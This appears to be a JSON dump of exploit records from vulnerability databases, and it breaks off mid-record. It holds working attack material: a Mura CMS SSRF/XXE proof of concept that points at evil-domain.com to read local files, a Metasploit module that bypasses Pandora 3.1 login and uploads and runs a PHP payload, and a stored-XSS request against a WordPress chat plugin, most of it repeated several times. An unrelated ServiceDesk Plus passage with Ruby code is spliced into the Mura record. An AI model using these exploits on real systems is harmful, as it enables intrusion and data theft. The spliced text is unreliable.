CVE-2017-15639 \n# Category: webapps \n \n1. Description \n \nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack. \n \n \n2. Proof of Concept \n \nvulnerable file is on github, line 50: \nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm \n \nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500 \n \nExplanation of params \nsiteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\". \nrssurl - This is the URL you want Mura CMS to call out to. 
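The ServiceDesk Plus module above exploits two things at once: the FileUploader servlet joins the `module` parameter under the attachment directory without checking it, so `../../server/default/deploy` lands an EAR in the JBoss hot-deploy directory, and the `check` method compares the `Login.js` build number as a string (`build < "9103" && build > "9000"`). The Ruby below is an added example, not the module's or the vendor's code: it models the vulnerable path join next to a hardened one that resolves the final path and requires it to stay under the attachment root, and shows why the build comparison should be numeric. The install path is an assumption.

```ruby
# Assumed install root; the real path varies by deployment.
ATTACH_DIR = '/opt/ManageEngine/ServiceDesk/Attachments'

# Model of the servlet's path building as the module's traversal implies:
# 'module' is joined under Attachments unchecked, so
# '../../server/default/deploy' lands in the JBoss hot-deploy directory.
def vulnerable_dest(mod, qqfile)
  File.join(ATTACH_DIR, mod, 'null', qqfile)
end

def escapes_root?(path)
  !File.expand_path(path).start_with?(ATTACH_DIR + '/')
end

# Hardened version: resolve the final path and require it to stay under
# ATTACH_DIR; refuse filenames carrying separators or parent references.
def safe_dest(mod, qqfile)
  if qqfile.empty? || qqfile.match?(%r{[/\\]}) || qqfile.include?('..')
    raise ArgumentError, 'bad filename'
  end
  rel  = [mod.to_s, 'null', qqfile].reject(&:empty?)
  dest = File.expand_path(File.join(*rel), ATTACH_DIR)
  raise ArgumentError, "path escapes attachment root: #{dest}" if escapes_root?(dest)
  dest
end

# The module's check compares Login.js build numbers as strings; that only
# holds while every build has four digits. A hypothetical five-digit build
# '91000' sorts between "9000" and "9103" as a string but not as a number.
def string_compare_vulnerable?(build)
  build < '9103' && build > '9000'
end

def vulnerable_build?(build)
  raise ArgumentError, 'build is not numeric' unless build.match?(/\A\d+\z/)
  b = build.to_i
  b >= 9000 && b <= 9102
end
```

Note that the module's string check also excludes build 9000 itself (`> "9000"`) although the description lists b9000 as tested; the numeric version above follows the description.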
\n \nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80 \n \nThen create a file: \n \n<?xml version=\"1.0\" ?> \n<!DOCTYPE rss [ \n<!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\"> \n]> \n \n<rss version=\"2.0\"> \n<channel> \n<title>title</title> \n<link>link</link> \n<description>description</description> \n<generator>http://www.getmura.com</generator> \n<pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate> \n<language>en-us</language> \n<item> \n<title>Item title</title> \n<link>http://host/</link> \n<guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid> \n<pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate> \n<description>&send;</description> \n</item> \n</channel> \n</rss> \n \n3. Solution: \n \ndelete readRSS.cfm from the server. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144764/muracms-ssrfxxe.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-05T22:12:28", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "href": "https://packetstormsecurity.com/files/129830/Pandora-3.1-Auth-Bypass-Arbitrary-File-Upload.html", "id": "PACKETSTORM:129830", "type": "packetstorm", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability in Pandora v3.1 as \ndisclosed by Juan Galiana Lara. 
It also integrates with the built-in pandora \nupload which allows a user to upload arbitrary files to the '/images/' directory. \n \nThis module was created as an exercise in the Metasploit Mastery Class at Blackhat \nthat was facilitated by egypt and mubix. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Juan Galiana Lara', # Vulnerability discovery \n'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module \n'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module \n'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module \n'_flood <freshbones[at]gmail.com>', # Metasploit module \n'mubix <mubix[at]room362.com>', # Auth bypass and file upload \n'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload \n], \n'References' => \n[ \n['CVE', '2010-4279'], \n['OSVDB', '69549'], \n['BID', '45112'] \n], \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Automatic Targeting', { 'auto' => true }] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Nov 30 2010\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), \n], self.class) \nend \n \ndef check \n \nbase = target_uri.path \n \n# retrieve software version from login page \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php') \n}) \nif res and res.code == 200 \n#Tested on v3.1 Build PC100609 and PC100608 \nif res.body.include?(\"v3.1 Build PC10060\") \nreturn Exploit::CheckCode::Appears \nelsif res.body.include?(\"Pandora\") \nreturn Exploit::CheckCode::Detected \nend \nend \nreturn Exploit::CheckCode::Safe \nrescue ::Rex::ConnectionError \nprint_error(\"#{peer} - Connection failed\") \nend \nreturn Exploit::CheckCode::Unknown \n \nend \n \n# upload a payload using the pandora built-in file upload \ndef upload(base, file, cookies) \ndata = Rex::MIME::Message.new \ndata.add_part(file, 'application/octet-stream', nil, \"form-data; 
name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\") \ndata.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"') \ndata.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"') \ndata.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"') \ndata_post = data.to_s \ndata_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(base, 'index.php'), \n'cookie' => cookies, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'vars_get' => { \n'sec' => 'gsetup', \n'sec2' => 'godmode/setup/file_manager', \n}, \n'data' => data_post \n}) \n \nregister_files_for_cleanup(@fname) \nreturn res \nend \n \ndef exploit \n \nbase = target_uri.path \n@fname = \"#{rand_text_numeric(7)}.php\" \ncookies = \"\" \n \n# bypass authentication and get session cookie \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php'), \n'vars_get' => { \n'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3', \n'loginhash_user' => 'admin', \n'loginhash' => '1', \n}, \n}) \n \n# fix if logic \nif res and res.code == 200 \nif res.body.include?(\"Logout\") \ncookies = res.get_cookies \nprint_status(\"Login Bypass Successful\") \nprint_status(\"cookie monster = \" + cookies) \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\") \nend \nend \n \n# upload PHP payload to images/[fname] \nprint_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\") \nphp = %Q|<?php #{payload.encoded} ?>| \nbegin \nres = upload(base, php, cookies) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nif res and res.code == 200 \nprint_good(\"#{peer} - File uploaded successfully\") \nelse \nfail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\") \nend \n \n# retrieve and execute PHP payload \nprint_status(\"#{peer} - Executing payload 
(images/#{@fname})\") \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'images', \"#{@fname}\") \n}, 1) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129830/pandora_upload_exec.rb.txt"}], "zdt": [{"lastseen": "2018-02-21T01:34:02", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2017-10-25T00:00:00", "published": "2017-10-25T00:00:00", "href": "https://0day.today/exploit/description/28866", "id": "1337DAY-ID-28866", "type": "zdt", "title": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection Vulnerabilities", "sourceData": "# Exploit Title: Mura CMS before 6.2 SSRF + XXE\r\n# Date: 30-10-2017\r\n# Exploit Author: Anthony Cole\r\n# Vendor Homepage: http://www.getmura.com/\r\n# Version: before 6.2\r\n# Contact: http://twitter.com/acole76\r\n# Website: http://twitter.com/acole76\r\n# Tested on: Windows 2008 w/ Coldfusion 8\r\n# CVE: CVE-2017-15639\r\n# Category: webapps\r\n \r\n1. Description\r\n \r\nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.\r\n \r\n \r\n2. 
Proof of Concept\r\n \r\nvulnerable file is on github, line 50:\r\nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm\r\n \r\nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500\r\n \r\nExplanation of params\r\n siteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\".\r\n rssurl - This is the URL you want Mura CMS to call out to.\r\n \r\nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80\r\n \r\nThen create a file:\r\n \r\n<?xml version=\"1.0\" ?>\r\n<!DOCTYPE rss [\r\n <!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\">\r\n]>\r\n \r\n<rss version=\"2.0\">\r\n<channel>\r\n <title>title</title>\r\n <link>link</link>\r\n <description>description</description>\r\n <generator>http://www.getmura.com</generator>\r\n <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>\r\n <language>en-us</language>\r\n <item>\r\n <title>Item title</title>\r\n <link>http://host/</link>\r\n <guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid>\r\n <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>\r\n <description>&send;</description>\r\n </item>\r\n</channel>\r\n</rss>\r\n \r\n3. 
Solution:\r\n \r\ndelete readRSS.cfm from the server.\n\n# 0day.today [2018-02-20] #", "sourceHref": "https://0day.today/exploit/28866", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-01T23:44:02", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-08-01T00:00:00", "published": "2016-08-01T00:00:00", "id": "1337DAY-ID-25206", "href": "https://0day.today/exploit/description/25206", "type": "zdt", "title": "WordPress WP Live Chat Support 6.2.03 Plugin - Persistent Cross-Site Scripting", "sourceData": "Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin\r\n \r\nAbstract\r\n \r\nA stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\n \r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\n \r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0010\r\n \r\nTested versions\r\n \r\nThis issue was successfully tested on WP Live Chat Support WordPress Plugin version 6.2.03.\r\n \r\nFix\r\n \r\nThis issue is resolved in WP Live Chat Support version 6.2.04.\r\n \r\nIntroduction\r\n \r\nWP Live Chat Support allows chatting with visitors of a WordPress site. 
A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\n \r\nThe vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602):\r\n \r\nwp-live-chat-support/wp-live-chat-support.php:\r\n \r\n600 if ($_POST['action'] == \"wplc_user_send_offline_message\") {\r\n601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }\r\n602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }\r\n603 do_action(\"wplc_hook_offline_message\",array(\r\n604 \"cid\"=>$_POST['cid'],\r\n605 \"name\"=>$_POST['name'],\r\n606 \"email\"=>$_POST['email'],\r\n607 \"url\"=>get_site_url(),\r\n608 \"msg\"=>$_POST['msg']\r\n609 )\r\n610 );\r\n611 }\r\n \r\nwp-live-chat-support/functions.php:\r\n \r\n1206 function wplc_store_offline_message($name, $email, $message){\r\n1207 global $wpdb;\r\n1208 global $wplc_tblname_offline_msgs;\r\n1209 \r\n1210 $wplc_settings = get_option('WPLC_SETTINGS');\r\n1211 \r\n1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){\r\n1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {\r\n1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];\r\n1215 } else {\r\n1216 $ip_address = $_SERVER['REMOTE_ADDR'];\r\n1217 }\r\n1218 $offline_ip_address = $ip_address;\r\n1219 } else {\r\n1220 
$offline_ip_address = \"\";\r\n1221 }\r\n1222 \r\n1223 \r\n1224 $ins_array = array(\r\n1225 'timestamp' => current_time('mysql'),\r\n1226 'name' => $name,\r\n1227 'email' => $email,\r\n1228 'message' => $message,\r\n1229 'ip' => $offline_ip_address,\r\n1230 'user_agent' => $_SERVER['HTTP_USER_AGENT']\r\n1231 );\r\n1232 \r\n1233 $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );\r\n1234 return;\r\n1235 }\r\n \r\nThe vulnerability can be exploited using a specially crafted POST request. The victim needs to view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted that the offline message functionality is available even if there is a logged on chat user present.\r\n \r\nProof of concept\r\n \r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: <target>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 361\r\nConnection: close\r\n \r\naction=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script>\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25206"}, {"lastseen": "2018-02-06T09:12:27", "bulletinFamily": "exploit", "description": "This Metasploit module exploits an authentication bypass vulnerability in Pandora version 3.1 as disclosed by Juan Galiana Lara. It also integrates with the built-in pandora upload which allows a user to upload arbitrary files to the '/images/' directory.
This Metasploit module was created as an exercise in the Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix.", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "id": "1337DAY-ID-23084", "href": "https://0day.today/exploit/description/23084", "type": "zdt", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload Vulnerabilities", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in Pandora v3.1 as\r\n disclosed by Juan Galiana Lara. 
It also integrates with the built-in pandora\r\n upload which allows a user to upload arbitrary files to the '/images/' directory.\r\n\r\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\r\n that was facilitated by egypt and mubix.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Juan Galiana Lara', # Vulnerability discovery\r\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\r\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\r\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\r\n '_flood <freshbones[at]gmail.com>', # Metasploit module\r\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\r\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2010-4279'],\r\n ['OSVDB', '69549'],\r\n ['BID', '45112']\r\n ],\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Automatic Targeting', { 'auto' => true }]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Nov 30 2010\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n base = target_uri.path\r\n\r\n # retrieve software version from login page\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php')\r\n })\r\n if res and res.code == 200\r\n #Tested on v3.1 Build PC100609 and PC100608\r\n if res.body.include?(\"v3.1 Build PC10060\")\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Pandora\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue ::Rex::ConnectionError\r\n print_error(\"#{peer} - Connection failed\")\r\n end\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # upload a payload using the pandora built-in file upload\r\n def 
upload(base, file, cookies)\r\n data = Rex::MIME::Message.new\r\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\r\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\r\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\r\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\r\n data_post = data.to_s\r\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'cookie' => cookies,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'vars_get' => {\r\n 'sec' => 'gsetup',\r\n 'sec2' => 'godmode/setup/file_manager',\r\n },\r\n 'data' => data_post\r\n })\r\n\r\n register_files_for_cleanup(@fname)\r\n return res\r\n end\r\n\r\n def exploit\r\n\r\n base = target_uri.path\r\n @fname = \"#{rand_text_numeric(7)}.php\"\r\n cookies = \"\"\r\n\r\n # bypass authentication and get session cookie\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'vars_get' => {\r\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\r\n 'loginhash_user' => 'admin',\r\n 'loginhash' => '1',\r\n },\r\n })\r\n\r\n # fix if logic\r\n if res and res.code == 200\r\n if res.body.include?(\"Logout\")\r\n cookies = res.get_cookies\r\n print_status(\"Login Bypass Successful\")\r\n print_status(\"cookie monster = \" + cookies)\r\n else\r\n fail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\")\r\n end\r\n end\r\n\r\n # upload PHP payload to images/[fname]\r\n print_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\")\r\n php = %Q|<?php #{payload.encoded} ?>|\r\n begin\r\n res = upload(base, php, cookies)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n if res and res.code == 200\r\n 
print_good(\"#{peer} - File uploaded successfully\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\r\n end\r\n\r\n # retrieve and execute PHP payload\r\n print_status(\"#{peer} - Executing payload (images/#{@fname})\")\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\r\n }, 1)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n end\r\nend\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23084"}], "exploitdb": [{"lastseen": "2017-10-25T16:30:50", "bulletinFamily": "exploit", "description": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection. CVE-2017-15639. Webapps exploit for CFM platform", "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "id": "EDB-ID:43045", "href": "https://www.exploit-db.com/exploits/43045/", "type": "exploitdb", "title": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection", "sourceData": "# Exploit Title: Mura CMS before 6.2 SSRF + XXE\r\n# Date: 30-10-2017\r\n# Exploit Author: Anthony Cole\r\n# Vendor Homepage: http://www.getmura.com/\r\n# Version: before 6.2\r\n# Contact: http://twitter.com/acole76\r\n# Website: http://twitter.com/acole76\r\n# Tested on: Windows 2008 w/ Coldfusion 8\r\n# CVE: CVE-2017-15639\r\n# Category: webapps\r\n \r\n1. Description\r\n \r\nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.\r\n \r\n \r\n2. 
Proof of Concept\r\n\r\nvulnerable file is on github, line 50:\r\nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm\r\n \r\nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500\r\n\r\nExplanation of params\r\n\tsiteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\".\r\n\trssurl - This is the URL you want Mura CMS to call out to.\r\n\t\r\nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80\r\n\t\r\nThen create a file:\r\n\r\n<?xml version=\"1.0\" ?>\r\n<!DOCTYPE rss [\r\n <!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\">\r\n]>\r\n\r\n<rss version=\"2.0\">\r\n<channel>\r\n <title>title</title>\r\n <link>link</link>\r\n <description>description</description>\r\n <generator>http://www.getmura.com</generator>\r\n <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>\r\n <language>en-us</language>\r\n <item>\r\n <title>Item title</title>\r\n <link>http://host/</link>\r\n <guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid>\r\n <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>\r\n <description>&send;</description>\r\n </item>\r\n</channel>\r\n</rss>\r\n \r\n3. Solution:\r\n\r\ndelete readRSS.cfm from the server.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43045/"}, {"lastseen": "2016-02-04T01:53:48", "bulletinFamily": "exploit", "description": "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability. CVE-2010-4279. 
Remote exploit for php platform", "modified": "2015-01-08T00:00:00", "published": "2015-01-08T00:00:00", "id": "EDB-ID:35731", "href": "https://www.exploit-db.com/exploits/35731/", "type": "exploitdb", "title": "Pandora 3.1 - Auth Bypass and Arbitrary File Upload Vulnerability", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in Pandora v3.1 as\r\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\r\n upload which allows a user to upload arbitrary files to the '/images/' directory.\r\n\r\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\r\n that was facilitated by egypt and mubix.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Juan Galiana Lara', # Vulnerability discovery\r\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\r\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\r\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\r\n '_flood <freshbones[at]gmail.com>', # Metasploit module\r\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\r\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2010-4279'],\r\n ['OSVDB', '69549'],\r\n ['BID', '45112']\r\n ],\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Automatic Targeting', { 'auto' => true }]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Nov 30 
2010\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n base = target_uri.path\r\n\r\n # retrieve software version from login page\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php')\r\n })\r\n if res and res.code == 200\r\n #Tested on v3.1 Build PC100609 and PC100608\r\n if res.body.include?(\"v3.1 Build PC10060\")\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Pandora\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue ::Rex::ConnectionError\r\n vprint_error(\"#{peer} - Connection failed\")\r\n end\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # upload a payload using the pandora built-in file upload\r\n def upload(base, file, cookies)\r\n data = Rex::MIME::Message.new\r\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\r\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\r\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\r\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\r\n data_post = data.to_s\r\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'cookie' => cookies,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'vars_get' => {\r\n 'sec' => 'gsetup',\r\n 'sec2' => 'godmode/setup/file_manager',\r\n },\r\n 'data' => data_post\r\n })\r\n\r\n register_files_for_cleanup(@fname)\r\n return res\r\n end\r\n\r\n def exploit\r\n\r\n base = target_uri.path\r\n @fname = \"#{rand_text_numeric(7)}.php\"\r\n cookies = \"\"\r\n\r\n # bypass authentication and get session cookie\r\n res = send_request_cgi({\r\n 
